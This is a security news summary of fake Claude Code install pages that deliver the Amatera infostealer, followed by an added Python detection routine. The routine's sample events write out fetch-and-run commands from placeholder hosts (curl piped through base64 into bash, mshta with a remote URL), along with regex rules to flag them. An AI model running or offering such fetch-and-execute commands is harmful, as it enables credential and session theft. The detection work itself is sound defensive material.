Malwarebytes warns of fake Claude Code install pages targeting Windows and Mac users: attackers clone the genuine pages and swap the one-liner install command for one that fetches malware, aiming to steal passwords, cookies, session tokens and access to developer environments. The campaign, part of InstallFix, has the user run a remote script that executes with the user's own permissions, which are often those of an administrator.
The main payload is an infostealer named Amatera, which collects browser data, saved passwords, cookies, session tokens, autofill data and general system information, giving the attackers what they need to hijack web sessions and log into cloud dashboards. On macOS, the malicious one-liner typically pulls a base64-encoded second-stage script from an attacker-controlled domain, which then downloads and runs a binary from another domain.
On Windows, the command has been seen spawning cmd[.]exe, which then calls mshta[.]exe with a remote URL, so the malicious code runs under a trusted, signed Microsoft binary while appearing to be a legitimate installer. The campaign was observed to target both platforms, underscoring the need for vigilance when following install instructions found online.
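As an added example, not from the Malwarebytes report, the following Python triage routine checks process-creation records for the two behaviours described above: mshta.exe handed a remote URL on Windows, and a fetched script decoded with base64 before being piped into a shell on macOS. The records, hostnames and example.invalid domains are constructed placeholders, not indicators from the campaign.

```python
import re

# Constructed sample process-creation records for illustration only; the
# domains are placeholders (example.invalid), not real campaign indicators.
SAMPLE_EVENTS = [
    {"id": 1, "os": "windows", "parent": "cmd.exe",
     "cmdline": "mshta.exe https://installer.example.invalid/setup.hta"},
    {"id": 2, "os": "macos", "parent": "zsh",
     "cmdline": "curl -fsSL https://cdn.example.invalid/stage2 | base64 -d | bash"},
    {"id": 3, "os": "windows", "parent": "explorer.exe",
     "cmdline": r"mshta.exe C:\Users\dev\AppData\Local\vendor\help.hta"},
    {"id": 4, "os": "macos", "parent": "zsh",
     "cmdline": "curl -fsSL https://downloads.example.invalid/install.sh | bash"},
]

# Rules keyed to the behaviours in the report. Event 3 (mshta with a local
# .hta) and event 4 (curl | bash without a base64 decode step) are left alone
# so the rules stay tied to the reported pattern rather than all scripting.
RULES = {
    "mshta_remote_url": re.compile(
        r"\bmshta(?:\.exe)?\b.*\bhttps?://", re.IGNORECASE),
    # macOS base64 accepts -D (older releases) as well as -d / --decode.
    "remote_base64_pipe_to_shell": re.compile(
        r"\b(?:curl|wget)\b.*\|\s*base64\s+(?:-d|-D|--decode)\b.*\|\s*(?:ba|z)?sh\b",
        re.IGNORECASE),
}


def classify(event):
    """Return the names of all rules matched by one event's command line."""
    hits = [name for name, rx in RULES.items() if rx.search(event["cmdline"])]
    # A cmd.exe parent matches the observed Windows chain; record it as context.
    if "mshta_remote_url" in hits and event.get("parent", "").lower() == "cmd.exe":
        hits.append("parent_is_cmd")
    return hits


def triage(events):
    """Return {event_id: [rule names]} for every event matching at least one rule."""
    findings = {}
    for ev in events:
        hits = classify(ev)
        if hits:
            findings[ev["id"]] = hits
    return findings


if __name__ == "__main__":
    for eid, hits in triage(SAMPLE_EVENTS).items():
        print(f"event {eid}: {', '.join(hits)}")
```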